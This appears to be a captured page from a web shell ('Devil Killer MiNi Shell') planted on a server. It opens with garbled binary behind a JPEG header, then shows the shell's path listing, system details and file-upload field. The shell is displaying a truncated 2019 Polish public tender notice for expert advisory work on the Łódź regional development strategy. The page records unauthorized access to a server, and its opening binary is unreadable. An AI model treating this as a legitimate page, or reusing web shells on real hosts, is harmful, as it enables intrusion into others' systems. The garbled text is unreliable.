JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20190130/508775-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 508775-N-2019 z dnia 2019-01-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Biuro Planowania Przestrzennego Województwa Łódzkiego w Łodzi</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Świadczenie usług doradztwa eksperckiego przy opracowaniu Strategii Rozwoju Województwa Łódzkiego 2030</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">EFS w ramach PT RPO 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Biuro Planowania Przestrzennego Województwa Łódzkiego w Łodzi</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">47127908100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Sienkiewicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">90113 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łódź</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-42 6305769 w. 103</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@bppwl.lodzkie.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-42 6305769 w.789</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.bppwl.lodzkie.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.bppwl.lodzkie.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Forma pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">BPPWŁ w Łodzi, ul. Piłsudskiego 12, 90-051 Łódź, pok. 712</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Świadczenie usług doradztwa eksperckiego przy opracowaniu Strategii Rozwoju Województwa Łódzkiego 2030</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BPPWŁ.ZA.26.2.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">tylko jednej części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Jedna część.</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Świadczenie usług doradztwa eksperckiego przy opracowaniu Strategii Rozwoju Województwa Łódzkiego 2030I. UZASADNIENIE REALIZACJI ZAMÓWIENIAPotrzeba opracowania Strategii Województwa Łódzkiego 2030 wynika ze zmian przyszłej polityki spójności Unii Europejskiej, jak również zbliżającego się zakończenia okresu, którego dotyczy obecna Strategia Rozwoju Województwa Łódzkiego 2020. Ponadto konieczne jest zapewnie spójności strategii regionalnej z zapisami aktualizowanych krajowych dokumentów strategicznych, w tym w szczególności Krajowej Strategii Rozwoju Regionalnego 2030 oraz przyjętego w październiku 2018 r. Uchwałą Rady Ministrów Systemu Zarządzania Rozwojem Polski. System ten zakłada sporządzanie zintegrowanych dokumentów zarządzania polityką rozwoju na wszystkich szczeblach: krajowym, regionalnym i lokalnym. Zapewnienie wszechstronnego i obiektywnego procesu tworzenia Strategii wymaga wsparcia zespołu opracowującego projekt Strategii przez zewnętrznych, niezależnych ekspertów naukowych. Wyłonieni w przedmiotowym postępowaniu eksperci muszą osobiście uczestniczyć w pracach zgodnie z niżej opisanym harmonogramem (dotyczy zadania nr: 1 i 2).II. PRZEDMIOT ZAMÓWIENIARealizacja zamówienia będzie polegała na wykonaniu dwóch zadań. Jeden Wykonawca może złożyć ofertę tylko na jedno zadanie.Zadanie IRealizacja Zadania I będzie polegała na świadczeniu usług doradztwa na każdym etapie opracowywania Strategii Rozwoju Województwa Łódzkiego 2030 przez Eksperta posiadającego wiedzę w zakresie polityki regionalnej, innowacyjności regionów, procesów rewitalizacji i ekonomiki miast (Ekspert 1). Do obowiązków Eksperta 1 będzie należał:1)	Współudział w przygotowaniu metodyki opracowania Strategii, w tym m. in. wyborze metod i technik badawczych oraz narzędzi analitycznych służących opracowaniu diagnozy.2)	Współudział w przygotowaniu części diagnostycznej Strategii obejmującej: (1) analizę uwarunkowań zewnętrznych oraz trendów rozwojowych o charakterze krajowym, europejskim i globalnym, (2) analizę uwarunkowań wewnętrznych, diagnozę sytuacji społecznej, gospodarczej i przestrzennej województwa wraz z wyznaczeniem obszarów koncentracji diagnozowanych zagadnień, (3) analizę trendów i prognoz rozwojowych województwa w okresie objętym strategią, (4) analizę strategiczną (5) określenie wyzwań rozwojowych z ich terytorializacją;3)	Współudział w określeniu wizji rozwoju regionu.4)	Współudział w określeniu celów i kierunków działań wraz z ich terytorializacją.5)	Współudział w określeniu i delimitacji Obszarów Strategicznej Interwencji.6)	Współudział w określeniu systemu realizacji Strategii, w tym programów wdrożeniowych oraz ram i narzędzi finansowych realizacji Strategii.7)	Współudział w stworzeniu systemu monitorowania i ewaluacji Strategii.8)	Współudział w przygotowaniu i prowadzeniu debat strategicznych w ramach RFT.Zadanie IIRealizacja Zadania II będzie polegała na świadczeniu usług doradztwa na każdym etapie opracowywania Strategii Rozwoju Województwa Łódzkiego 2030 przez Eksperta posiadającego wiedzę w zakresie zarządzania strategicznego, strategii rozwoju miast i regionów, planowania zintegrowanego na poziomie regionalnym, ewaluacji (Ekspert 2).Do obowiązków Eksperta 2 będzie należał:1)	Współudział w przygotowaniu metodyki opracowania Strategii, w tym m. in. wyborze metod i technik badawczych oraz narzędzi analitycznych służących opracowaniu diagnozy.2)	Współudział w przygotowaniu części diagnostycznej Strategii obejmującej: (1) analizę uwarunkowań zewnętrznych oraz trendów rozwojowych o charakterze krajowym, europejskim i globalnym, (2) analizę uwarunkowań wewnętrznych, diagnozę sytuacji społecznej, gospodarczej i przestrzennej województwa wraz z wyznaczeniem obszarów koncentracji diagnozowanych zagadnień, (3) analizę trendów i prognoz rozwojowych województwa w okresie objętym strategią, (4) analizę strategiczną (5) określenie wyzwań rozwojowych z ich terytorializacją;3)	Współudział w określeniu wizji rozwoju regionu.4)	Współudział w określeniu celów i kierunków działań wraz z ich terytorializacją.5)	Współudział w określeniu i delimitacji Obszarów Strategicznej Interwencji.6)	Współudział w określeniu systemu realizacji Strategii, w tym programów wdrożeniowych oraz ram i narzędzi finansowych realizacji Strategii.7)	Współudział w stworzeniu systemu monitorowania i ewaluacji Strategii.8)	Współudział w przygotowaniu i prowadzeniu debat strategicznych w ramach RFT.III. ZADANIA WYKONAWCÓWWykonawcy przedmiotu zamówienia (Ekspert nr 1 i Ekspert nr 2) są zobowiązaniu do:1.	osobistego udziału w 17 spotkaniach konsultacyjnych Zespołu opracowującego projekt SRWŁ 2020, w siedzibie Zamawiającego, w godzinach pracy Biura, średnio po 4 godziny (łącznie 68 godzin w ramach spotkań konsultacyjnych). Poza obligatoryjnym uczestnictwem w spotkaniach konsultacyjnych, dopuszcza się realizację doradztwa drogą elektroniczną (e-mail, wideokonferencja, telekonferencja). 2.	przygotowywania uwag, opiniowania elementów składowych projektu Strategii oraz opracowywania materiałów na spotkania konsultacyjne. Forma i zakres sporządzanych przez Ekspertów uwag, opinii i innych dokumentów przygotowywanych na spotkania konsultacyjne będzie każdorazowo ustalana z Zamawiającym poprzez e-mail. Na pracę merytoryczną związaną z przygotowaniem ww. dokumentów każdy z Ekspertów przeznaczy średnio po 4 godziny przed każdym z 17 spotkań (łącznie 68 godzin na przygotowanie merytoryczne).3.	współudziału w przygotowaniu merytorycznym i przeprowadzeniu debat strategicznych w ramach 4 spotkań Regionalnego Forum Terytorialnego (RFT). Przygotowanie merytoryczne rozumie się jako współudział w określeniu zakresu tematycznego spotkania RFT oraz w opracowaniu treści merytorycznej wystąpień. Prowadzenie debat rozumie się jako przedstawienie wyników kolejnych etapów prac, moderowanie dyskusji oraz komentowanie uwag zgłaszanych podczas spotkania. Każdy z ekspertów przeznaczy przeciętnie po 6 godzin na przygotowanie merytoryczne oraz przeprowadzenie 4 debat strategicznych (łącznie 24 godziny na przygotowanie i udział w 4 spotkaniach RFT).4.	dokumentowania faktycznego czasu pracy przeznaczonego na realizację zadań wymienionych w pkt. III.1-4. Udokumentowana (za pomocą formularza czasu pracy - załącznik 6) liczba faktycznie przepracowanych godzin stanowi podstawę naliczenia wartości wynagrodzenia każdego z Ekspertów, wypłacanego w cyklu miesięcznym, zgodnie z przyjętą stawką godzinową brutto. Obowiązkiem ekspertów jest wykazanie faktycznego czasu pracy przeznaczonego realizację zadań wskazanych w punktach III.1-4, których łączny wymiar nie przekroczy 160 godzin. Faktyczny czas pracy rozumie się jako: (1) czas obecności i aktywnego udziału w spotkaniach roboczych, prowadzenia debat strategicznych podczas RFT. Nieobecność Ekspertów na ustalonym spotkaniu wiąże się z brakiem możliwości rozliczenia czasu spotkania. Nieobecność Eksperta na wszystkich spotkaniach w danym miesiącu (nieusprawiedliwiona) może skutkować zmniejszeniem wartości wynagrodzenia brutto wypłaconego w kolejnym miesiącu o 2% jego wartości. W przypadku braku uczestnictwa (nieobecności nieusprawiedliwionej) w pracach nad Strategią przez 2 kolejne miesiące, Zamawiający zastrzega sobie prawo odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.(2) czas przeznaczony na opracowanie uwag, opinii, materiałów, treści merytorycznych na spotkania. Elementem dokumentacji czasu pracy związanej z wykonywaniem zadań w ramach zamówienia przez każdego Ekspertów są, w zależności od potrzeb Zamawiającego, uwagi szczegółowe (komentarze do tekstu w formie dymków, w trybie rejestruj zmiany), pisemne opinie, materiały i teksty merytoryczne przekazane Zamawiającemu w formie elektronicznej. Eksperci powinni pozostawać w stałym kontakcie (telefonicznym, e-mailowym oraz osobistym) z Zamawiającym.W przypadku braku porozumienia podczas realizacji przedmiotu zamówienia Zamawiający ma głos decydujący.VI. HARMONOGRAM REALIZACJI ZAMÓWIENIACałkowity czas realizacji zamówienia dla każdego z Ekspertów to 160 godzin udziału w spotkaniach (w tym w 4 spotkaniach RFT) w okresie od podpisania umowy (prawdopodobnie luty 2019 r.) do 31.12.2019 roku. Ramowy harmonogram zadań zamieszczono w tabeli 1. Uszczegółowienie ramowego harmonogramu realizacji zamówienia będzie wynikać z toku prac nad projektem Strategii i może podlegać modyfikacjom. O ww. modyfikacjach Wykonawca zostanie niezwłocznie powiadomiony. Wykonawca zobowiązany jest przyjąć wskazane przez Zamawiającego modyfikacje. Modyfikacje nie skutkują zmianą całkowitej liczby godzin objętych harmonogramem.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">85312320-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">87360,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">złp</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span 